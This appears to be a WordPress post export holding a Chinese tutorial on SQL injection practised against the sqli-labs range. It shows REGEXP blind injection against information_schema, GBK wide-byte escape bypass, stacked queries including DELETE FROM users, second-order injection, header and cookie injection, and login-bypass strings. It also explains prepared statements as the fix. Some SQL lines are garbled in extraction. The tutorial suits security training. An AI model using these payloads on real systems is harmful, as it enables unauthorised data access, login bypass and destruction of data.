    \nmysql>SELECT name FRoM person tbl WHERE name REGEXP 'ok$'s
    \n\u67e5\u627ename\u5b57\u6bb5\u4e2d\u5305\u542b'mar'\u5b57\u7b26\u4e32\u7684\u6240\u6709\u6570\u636e
    \nmysql>SELECT name FRoM person tbl WHERE name REGEXP'mar 5
    \n\u67e5\u627ename\u5b57\u6bb5\u4e2d\u4ee5\u5143\u97f3\u5b57\u7b26\u5f00\u5934\u6216\u4ee5'ok'\u5b57\u7b26\u4e32\u7ed3\u5c3e\u7684\u6240\u6709\u6570\u636e
    \nmysql>SELECT name FRoM person tbl WHERE name REGEXP>"e[aeiou]|ok$\u2019s<\/p>\n

    \u5df2\u77e5\u6570\u636e\u5e93\u540d\u4e3a security,\u5224\u65ad\u7b2c\u4e00\u4e2a\u8868\u7684\u8868\u540d\u662f\u5426\u4ee5 a-z \u4e2d\u7684\u5b57\u7b26\u5f00\u5934,^[a-z]\u2013> ^a ; \u5224\u65ad\u51fa\u4e86\u7b2c\u4e00\u4e2a\u8868\u7684\u7b2c\u4e00\u4e2a\u5b57\u7b26,\u63a5\u7740\u5224\u65ad\u7b2c\u4e00\u4e2a\u8868\u7684\u7b2c\u4e8c\u4e2a\u5b57\u7b26 ^a[a-z] –> ^ad ; \u5c31\u8fd9\u6837,\u4e00\u6b65\u4e00\u6b65\u5224\u65ad\u7b2c\u4e00\u4e2a\u8868\u7684\u8868\u540d ^admin$ \u3002\u7136\u540e limit 1,1 \u5224\u65ad\u7b2c\u4e8c\u4e2a\u8868
    \n\/\/ \u5224\u65adsecurity\u6570\u636e\u5e93\u4e0b\u7684\u7b2c\u4e00\u4e2a\u8868\u7684\u662f\u5426\u4ee5a-z\u7684\u5b57\u6bcd\u5f00\u5934<\/p>\n

    http:\/\/127.0.0.1\/sqli\/Less-1\/?id=1' and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^[a-z]' limit 0,1) #<\/p>\n

    \u5bbd\u5b57\u8282\u6ce8\u5165:<\/h3>\n

    \u539f\u7406:
    \n\u5bbd\u5b57\u8282\u6ce8\u5165\u7684\u672c\u8d28\u662f\u5229\u7528\u53cc\u5b57\u8282\u7f16\u7801(\u5982 GBK)\u7684\u89e3\u6790\u7279\u6027,\u6253\u7834\u5e94\u7528\u7a0b\u5e8f\u5bf9\u5355\u5f15\u53f7\u7684\u8f6c\u4e49\u4fdd\u62a4\u3002
    \n\u8f6c\u4e49\u673a\u5236\u7684\u5e38\u89c4\u64cd\u4f5c
    \n\u5e94\u7528\u7a0b\u5e8f\u901a\u5e38\u4f1a\u7528\u53cd\u659c\u6760(\\\\)\u8f6c\u4e49\u5355\u5f15\u53f7(\u2018),\u4f8b\u5982:
    \n\u7528\u6237\u8f93\u5165\u2019 \u2192 \u8f6c\u4e49\u540e\u53d8\u4e3a\u2019(\\\\\u7684 ASCII \u7801\u662f0x5C,\u2018\u662f0x27)\u3002
    \n\u5bbd\u5b57\u8282\u7684 \u201c\u541e\u566c\u201d \u903b\u8f91
    \n\u5728 GBK \u7f16\u7801\u4e2d,\u4e24\u4e2a\u5b57\u8282\u53ef\u7ec4\u6210\u4e00\u4e2a\u6c49\u5b57,\u4e14\u7b2c\u4e00\u4e2a\u5b57\u8282\u8303\u56f4\u662f0x81-0xFE\u3002
    \n\u82e5\u653b\u51fb\u8005\u8f93\u5165\u4e00\u4e2a0x81-0xFE\u8303\u56f4\u5185\u7684\u5b57\u7b26(\u59820xBF),\u4f1a\u53d1\u751f:
    \n\u8f93\u5165\u5b57\u7b260xBF + \u8f6c\u4e49\u7b260x5C \u2192 \u7ec4\u6210 GBK \u6c49\u5b570xBF5C(\u201c\u7f1e\u201d \u5b57)
    \n\u539f\u672c\u7528\u4e8e\u8f6c\u4e49\u76840x5C\u88ab \u201c\u5403\u6389\u201d,\u5355\u5f15\u53f70x27\u6062\u590d\u539f\u6837,\u6210\u529f\u95ed\u5408 SQL \u8bed\u53e5\u3002
    \n\u793a\u4f8b:
    \n\u7f51\u7ad9\u4f7f\u7528\u7684\u65f6GBK\u7f16\u7801
    \n\u653b\u51fb\u8005\u8f93\u5165:%BF\u2019 OR 1=1#(%BF\u662f0xBF\u7684 URL \u7f16\u7801)
    \n\u670d\u52a1\u5668\u8f6c\u4e49\u540e\u53d8\u4e3a:0xBF 0x5C 0x27 OR 1=1#
    \nGBK \u89e3\u6790:0xBF5C\u88ab\u8bc6\u522b\u4e3a\u6c49\u5b57 \u201c\u7f1e\u201d,\u5269\u4f590x27(\u5355\u5f15\u53f7)\u95ed\u5408\u5b57\u7b26\u4e32<\/p>\n

    SELECT * FROM users WHERE username = '\u7f1e' OR 1=1#'<\/p>\n

    \u6ce8\u5165\u6210\u529f<\/p>\n

    \u5806\u53e0\u6ce8\u5165:<\/h3>\n

    \u6709\u5174\u8da3\u53ef\u4ee5\u53bb\u627e\u3010\u5f3a\u7f51\u676f 2019\u3011\u968f\u4fbf\u6ce8\u8fd9\u9053\u9898\u770b\u770b
    \n\u5806\u53e0\u6ce8\u5165(Stacked Injections)\u6307\u653b\u51fb\u8005\u5728\u540c\u4e00\u4e2a\u6570\u636e\u5e93\u8fde\u63a5\u4e2d,\u901a\u8fc7\u5206\u53f7(;)\u5206\u9694,\u4e00\u6b21\u6027\u6267\u884c\u591a\u6761 SQL \u8bed\u53e5,\u4ece\u800c\u7a81\u7834\u5e94\u7528\u7a0b\u5e8f\u7684\u9650\u5236,\u6267\u884c\u989d\u5916\u7684\u6076\u610f\u64cd\u4f5c\u3002
    \n\u4e0b\u9762\u65f6\u4e00\u6761\u5806\u53e0\u6ce8\u5165\u7684\u8bed\u53e5<\/p>\n

    SELECT * FROM users WHERE id=1; DELETE FROM users;<\/p>\n

    \u6570\u636e\u5e93\u4f1a\u5148\u6267\u884c\u67e5\u8be2,\u518d\u6267\u884c\u5220\u9664\u64cd\u4f5c\u3002<\/p>\n

    \u9884\u7f16\u8bd1<\/h3>\n

    \u539f\u7406:<\/h4>\n

    \u4f20\u7edf SQL \u6267\u884c\u6d41\u7a0b\u662f \u201c\u62fc\u63a5 SQL \u5b57\u7b26\u4e32 \u2192 \u63d0\u4ea4\u6570\u636e\u5e93 \u2192 \u6570\u636e\u5e93\u89e3\u6790 \/ \u7f16\u8bd1 \u2192 \u6267\u884c\u201d,\u800c\u9884\u7f16\u8bd1\u5c06\u6d41\u7a0b\u62c6\u5206\u4e3a\u4e24\u6b65:
    \n\u7f16\u8bd1\u9636\u6bb5:\u63d0\u4ea4\u5305\u542b\u5360\u4f4d\u7b26\u7684 SQL \u6a21\u677f(\u5982 SELECT * FROM users WHERE id = ?),\u6570\u636e\u5e93\u5bf9\u6a21\u677f\u8fdb\u884c\u8bed\u6cd5\u89e3\u6790\u3001\u4f18\u5316\u3001\u751f\u6210\u6267\u884c\u8ba1\u5212,\u5e76\u5c06\u7f16\u8bd1\u7ed3\u679c\u7f13\u5b58\u3002
    \n\u6267\u884c\u9636\u6bb5:\u4ec5\u4f20\u5165\u5177\u4f53\u53c2\u6570(\u5982 1),\u6570\u636e\u5e93\u76f4\u63a5\u4f7f\u7528\u7f13\u5b58\u7684\u6267\u884c\u8ba1\u5212\u6267\u884c,\u65e0\u9700\u91cd\u65b0\u89e3\u6790\u7f16\u8bd1\u3002
    \n\u8fd9\u79cd\u673a\u5236\u786e\u4fdd\u53c2\u6570\u4ec5\u4f5c\u4e3a\u6570\u636e\u5904\u7406,\u4e0d\u4f1a\u88ab\u89e3\u6790\u4e3a SQL \u6307\u4ee4,\u4ece\u6839\u672c\u4e0a\u907f\u514d\u4e86 SQL \u6ce8\u5165\u3002<\/p>\n

    \u901a\u7528 SQL \u9884\u7f16\u8bd1\u8bed\u6cd5(\u5206\u6b65\u9aa4\u6267\u884c)<\/h4>\n

    \u591a\u6570\u5173\u7cfb\u578b\u6570\u636e\u5e93(\u5982 MySQL\u3001PostgreSQL\u3001SQL Server\u3001Oracle)\u652f\u6301\u9884\u7f16\u8bd1,\u6838\u5fc3\u8bed\u6cd5\u5305\u62ec \u5b9a\u4e49\u6a21\u677f\u3001\u4f20\u5165\u53c2\u6570\u6267\u884c\u3001\u91ca\u653e\u8d44\u6e90 \u4e09\u4e2a\u6b65\u9aa4,\u4ee5\u4e0b\u662f\u901a\u7528\u793a\u4f8b:<\/p>\n

  • \u5b9a\u4e49\u9884\u7f16\u8bd1\u6a21\u677f(PREPARE)
    \n\u4f7f\u7528 PREPARE \u8bed\u53e5\u5b9a\u4e49 SQL \u6a21\u677f,\u7528\u5360\u4f4d\u7b26\u8868\u793a\u540e\u7eed\u8981\u4f20\u5165\u7684\u53c2\u6570\u3002
    \n\u5360\u4f4d\u7b26\u683c\u5f0f:
    \n\u533f\u540d\u5360\u4f4d\u7b26:?(MySQL\u3001PostgreSQL\u3001SQL Server \u7b49\u901a\u7528)\u3002
    \n\u547d\u540d \/ \u4f4d\u7f6e\u5360\u4f4d\u7b26:$1\u3001$2(PostgreSQL)\u6216 :param(Oracle)\u3002
    \n\u2013 \u793a\u4f8b 1:MySQL\/PostgreSQL \u533f\u540d\u5360\u4f4d\u7b26(?)<\/li>\n

    PREPARE user_stmt FROM 'SELECT id, username FROM users WHERE age > ? AND status = ?';<\/p>\n

    \u2013 \u793a\u4f8b 2:PostgreSQL \u4f4d\u7f6e\u5360\u4f4d\u7b26($1\u3001$2)<\/p>\n

    PREPARE user_stmt (int, text) AS 'SELECT id, username FROM users WHERE age > $1 AND status = $2';<\/p>\n

    \u2013 \u793a\u4f8b 3:Oracle \u547d\u540d\u5360\u4f4d\u7b26(:age\u3001:status)<\/p>\n

    PREPARE user_stmt FROM 'SELECT id, username FROM users WHERE age > :age AND status = :status';<\/p>\n

  • \u4f20\u5165\u53c2\u6570\u5e76\u6267\u884c(EXECUTE)
    \n\u901a\u8fc7 EXECUTE \u8bed\u53e5\u4f20\u5165\u5177\u4f53\u53c2\u6570,\u6267\u884c\u9884\u7f16\u8bd1\u597d\u7684 SQL \u6a21\u677f\u3002
    \n\u53c2\u6570\u9700\u4e0e\u5360\u4f4d\u7b26\u6570\u91cf\u3001\u7c7b\u578b\u4e00\u4e00\u5bf9\u5e94\u3002
    \nsql
    \n\u2013 \u793a\u4f8b 1:MySQL \u6267\u884c(USING \u540e\u8ddf\u53c2\u6570)<\/li>\n

    EXECUTE user_stmt USING 18, 'active'; — \u5e74\u9f84>18 \u4e14 \u72b6\u6001\u4e3a'active'<\/p>\n

    \u2013 \u793a\u4f8b 2:PostgreSQL \u6267\u884c(\u76f4\u63a5\u4f20\u5165\u53c2\u6570)<\/p>\n

    EXECUTE user_stmt(18, 'active'); — \u5bf9\u5e94 $1=18,$2='active'<\/p>\n

    \u2013 \u793a\u4f8b 3:Oracle \u6267\u884c(USING \u7ed1\u5b9a\u547d\u540d\u53c2\u6570)<\/p>\n

    EXECUTE user_stmt USING 18, 'active'; — \u5bf9\u5e94 :age=18,:status='active'<\/p>\n

  • \u91ca\u653e\u9884\u7f16\u8bd1\u8d44\u6e90(DEALLOCATE)
    \n\u9884\u7f16\u8bd1\u8bed\u53e5\u4f1a\u5360\u7528\u6570\u636e\u5e93\u7f13\u5b58\u8d44\u6e90,\u4e0d\u9700\u8981\u65f6\u9700\u91ca\u653e(\u90e8\u5206\u6570\u636e\u5e93\u4f1a\u81ea\u52a8\u56de\u6536,\u4f46\u663e\u5f0f\u91ca\u653e\u66f4\u89c4\u8303)\u3002
    \n\u2013 MySQL\/PostgreSQL\/Oracle \u901a\u7528\u91ca\u653e\u8bed\u6cd5<\/li>\n

    DEALLOCATE PREPARE user_stmt;<\/p>\n

    \u4e8c\u6b21\u6ce8\u5165:<\/h3>\n

    \u793a\u4f8b:
    \n\u5efa\u7acb\u4e00\u4e2a\u7528\u6237
    \n\u7528\u6237\u540d:admin\u2019#
    \n\u5bc6\u7801:123456
    \n\u4fee\u6539\u8be5\u7528\u6237\u540d\u7684\u5bc6\u7801\u4e3a:aaaaaa
    \n\u6b64\u65f6admin\u2019#\u7684\u5bc6\u7801\u6ca1\u6709\u53d8,\u4e8cadmin\u7684\u5bc6\u7801\u53d8\u4e3aaaaaaa
    \n\u539f\u7406<\/p>\n

    $sql = "UPDATE users SET PASSWORD='aaaaaaaaaa' where username='admin'#' and password='$curr_pass' ";<\/p>\n

    #\u540e\u8fb9\u7684\u6ce8\u91ca\u6389\u4e86<\/p>\n

    User-Agent\u6ce8\u5165:<\/h3>\n

    \u786e\u5b9a\u662fUser-Agent\u6ce8\u5165\u540e(\u53c2\u6570\u4f20\u9012\u5728User-Agent\u4e2d),\u6293\u5305,\u7136\u540e\u5728\u8be5\u5934\u5199\u5165\u76f8\u5e94\u7684\u6ce8\u5165\u8bed\u53e5\u4e0d\u65ad\u91cd\u653e\u5373\u53ef,<\/p>\n

    Cookie\u6ce8\u5165:<\/h3>\n

    \u786e\u5b9a\u662fCookie\u6ce8\u5165\u540e(\u53c2\u6570\u4f20\u9012\u5728cookie\u4e2d),\u6293\u5305,\u7136\u540e\u5728\u8be5\u5934\u5199\u5165\u76f8\u5e94\u7684\u6ce8\u5165\u8bed\u53e5\u4e0d\u65ad\u91cd\u653e\u5373\u53ef,<\/p>\n

    \u4e07\u80fd\u5bc6\u7801:<\/h3>\n

    sql="select*from test where username=\u2019 XX \u2019 and password=\u2019 XX \u2019 ";
    \nadmin\u2019 or \u20181\u2019='1 XX \/\/\u4e07\u80fd\u5bc6\u7801(\u5df2\u77e5\u7528\u6237\u540d)
    \nXX \u2018or\u20191\u2019='1 \/\/\u4e07\u80fd\u5bc6\u7801(\u4e0d\u9700\u8981\u77e5\u9053\u7528\u6237\u540d)
    \n'or \u20181\u2019=\u20181\u2019# XX \/\/\u4e07\u80fd\u5bc6\u7801(\u4e0d\u77e5\u9053\u7528\u6237\u540d)<\/p>\n","protected":false},"excerpt":{"rendered":"

    \u6587\u7ae0\u6d4f\u89c8\u9605\u8bfb594\u6b21\uff0c\u70b9\u8d5e32\u6b21\uff0c\u6536\u85cf23\u6b21\u3002\u672c\u6587\u6db5\u76d6\u4e86SQL\u6ce8\u5165\u7684\u4e3b\u8981\u4e00\u4e9b\u65b9\u6cd5\uff0c\u57fa\u4e8esqli-labs\u9776\u573a\uff0c\u5efa\u8bae\u624b\u5de5\u6ce8\u5165\u624e\u5b9e\u81ea\u5df1\u7684\u57fa\u7840\u3002\u672c\u6587\u5199\u7684\u4e0d\u662f\u5f88\u597d\uff0c\u6709\u9519\u8bef\u4e4b\u5904\u8bf7\u6307\u51fa\uff01<\/p>\n","protected":false},"author":2,"featured_media":56524,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[604,768,275,100,122],"topic":[],"class_list":["post-56537","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-server","tag-oracle","tag-sql","tag-web","tag-100","tag-122"],"yoast_head":"\nSQL\u6ce8\u5165 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.wsisp.com\/helps\/56537.html\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SQL\u6ce8\u5165 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"og:description\" content=\"\u6587\u7ae0\u6d4f\u89c8\u9605\u8bfb594\u6b21\uff0c\u70b9\u8d5e32\u6b21\uff0c\u6536\u85cf23\u6b21\u3002\u672c\u6587\u6db5\u76d6\u4e86SQL\u6ce8\u5165\u7684\u4e3b\u8981\u4e00\u4e9b\u65b9\u6cd5\uff0c\u57fa\u4e8esqli-labs\u9776\u573a\uff0c\u5efa\u8bae\u624b\u5de5\u6ce8\u5165\u624e\u5b9e\u81ea\u5df1\u7684\u57fa\u7840\u3002\u672c\u6587\u5199\u7684\u4e0d\u662f\u5f88\u597d\uff0c\u6709\u9519\u8bef\u4e4b\u5904\u8bf7\u6307\u51fa\uff01\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.wsisp.com\/helps\/56537.html\" \/>\n<meta property=\"og:site_name\" content=\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"article:published_time\" content=\"2025-08-14T12:15:28+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250814121517-689dd3555d83a.png\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/56537.html\",\"url\":\"https:\/\/www.wsisp.com\/helps\/56537.html\",\"name\":\"SQL\u6ce8\u5165 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"isPartOf\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\"},\"datePublished\":\"2025-08-14T12:15:28+00:00\",\"dateModified\":\"2025-08-14T12:15:28+00:00\",\"author\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/56537.html#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.wsisp.com\/helps\/56537.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/56537.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9875\",\"item\":\"https:\/\/www.wsisp.com\/helps\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"SQL\u6ce8\u5165\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\",\"url\":\"https:\/\/www.wsisp.com\/helps\/\",\"name\":\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"description\":\"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"contentUrl\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"caption\":\"admin\"},\"sameAs\":[\"http:\/\/wp.wsisp.com\"],\"url\":\"https:\/\/www.wsisp.com\/helps\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"SQL\u6ce8\u5165 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.wsisp.com\/helps\/56537.html","og_locale":"zh_CN","og_type":"article","og_title":"SQL\u6ce8\u5165 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","og_description":"\u6587\u7ae0\u6d4f\u89c8\u9605\u8bfb594\u6b21\uff0c\u70b9\u8d5e32\u6b21\uff0c\u6536\u85cf23\u6b21\u3002\u672c\u6587\u6db5\u76d6\u4e86SQL\u6ce8\u5165\u7684\u4e3b\u8981\u4e00\u4e9b\u65b9\u6cd5\uff0c\u57fa\u4e8esqli-labs\u9776\u573a\uff0c\u5efa\u8bae\u624b\u5de5\u6ce8\u5165\u624e\u5b9e\u81ea\u5df1\u7684\u57fa\u7840\u3002\u672c\u6587\u5199\u7684\u4e0d\u662f\u5f88\u597d\uff0c\u6709\u9519\u8bef\u4e4b\u5904\u8bf7\u6307\u51fa\uff01","og_url":"https:\/\/www.wsisp.com\/helps\/56537.html","og_site_name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","article_published_time":"2025-08-14T12:15:28+00:00","og_image":[{"url":"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2025\/08\/20250814121517-689dd3555d83a.png"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"admin","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"8 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.wsisp.com\/helps\/56537.html","url":"https:\/\/www.wsisp.com\/helps\/56537.html","name":"SQL\u6ce8\u5165 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","isPartOf":{"@id":"https:\/\/www.wsisp.com\/helps\/#website"},"datePublished":"2025-08-14T12:15:28+00:00","dateModified":"2025-08-14T12:15:28+00:00","author":{"@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41"},"breadcrumb":{"@id":"https:\/\/www.wsisp.com\/helps\/56537.html#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.wsisp.com\/helps\/56537.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.wsisp.com\/helps\/56537.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"https:\/\/www.wsisp.com\/helps"},{"@type":"ListItem","position":2,"name":"SQL\u6ce8\u5165"}]},{"@type":"WebSite","@id":"https:\/\/www.wsisp.com\/helps\/#website","url":"https:\/\/www.wsisp.com\/helps\/","name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","description":"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"Person","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41","name":"admin","image":{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/","url":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","contentUrl":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","caption":"admin"},"sameAs":["http:\/\/wp.wsisp.com"],"url":"https:\/\/www.wsisp.com\/helps\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/56537","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/comments?post=56537"}],"version-history":[{"count":0,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/56537\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/media\/56524"}],"wp:attachment":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/media?parent=56537"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/categories?post=56537"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/tags?post=56537"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/topic?post=56537"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}